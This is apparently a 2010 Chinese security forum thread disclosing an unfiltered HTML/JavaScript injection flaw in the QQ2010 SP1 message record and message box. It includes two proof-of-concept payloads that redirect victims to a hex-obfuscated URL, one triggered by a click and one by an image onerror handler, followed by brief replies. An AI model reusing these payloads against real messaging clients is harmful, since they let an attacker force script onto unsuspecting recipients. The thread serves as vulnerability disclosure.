主题 : QQ腾讯2010SP1发布即现严重漏洞

amxking在线

Information Security

级别: 管理员

UID: 3
精华: 47
发帖: 3035
安全币: 421473 枚
威望: 5776 点
贡献值: 5649 点
红科币: 285890 枚
好评度: 5766 点
在线时间: 2214(时)
注册时间: 2009-12-21
最后登录: 2010-09-09

楼主发表于: 2010-07-28 15:18

QQ腾讯2010SP1发布即现严重漏洞

发表：红科网安
腾讯QQ一向是腾讯主打的产品，意想不到前天发布的QQ2010SP1竟然有如此大漏洞。
首先囧一下:脚本出错还会提示错误

1、消息记录的Javascript、Html标签没有屏蔽

2、消息盒子Javascript、Html标签没有屏蔽

3、小实验

1、发送代码：<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

因为腾讯会自动将url转换，我们必须混淆url才能发送

4、超牛代码

<img src=’http://bbs.honkwin.com’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

因为要点击才能触发，想到一个不用点击就能触发的代码。

5、希望腾讯快点修复，这个漏洞非同小可

6、本漏洞由TGL发现。

注意，本代码仅供研究之用，请勿用于不当用途。
如打算规避漏洞带来的风险，请下载SP0版本，看来SP1版本的changelog得修改为“更新了一些漏洞”。

In me the tiger sniffe the rose !浩瀚的宇宙中,我仅仅是一粒微尘!众人皆为吾师!

idea4在线

镜花乄水月

级别: 论坛版主

UID: 1946
精华: 5
发帖: 493
安全币: 2028 枚
威望: 704 点
贡献值: 940 点
红科币: 738 枚
好评度: 699 点
在线时间: 2779(时)
注册时间: 2010-04-01
最后登录: 2010-09-09

沙发发表于: 2010-07-28 19:03

我刚上了了sp1
晕

QQ吻在线

Crack8_编程小组[K.8]

级别: 助理安全工程师

UID: 2553
精华: 0
发帖: 23
安全币: 160 枚
威望: 36 点
贡献值: 36 点
红科币: 42 枚
好评度: 36 点
在线时间: 259(时)
注册时间: 2010-06-11
最后登录: 2010-09-09

板凳发表于: 2010-07-28 22:24

刚才也听我的群友这么说奇怪了我也是昨天刚下载的SP1 没更新呢以上代码测试没反应

http://bbs.honkwin.com
访问内容超出本站范围，不能确定是否安全
继续访问	取消访问

快速回复
	限 100 字节如果您提交过一次失败了，可以用”恢复数据”来恢复帖子内容进入高级模式加粗字体颜色背景颜色插入链接图片验证问题: 我们的组织是? 正确答案:红科网安按"Ctrl+Enter"直接提交	上一个下一个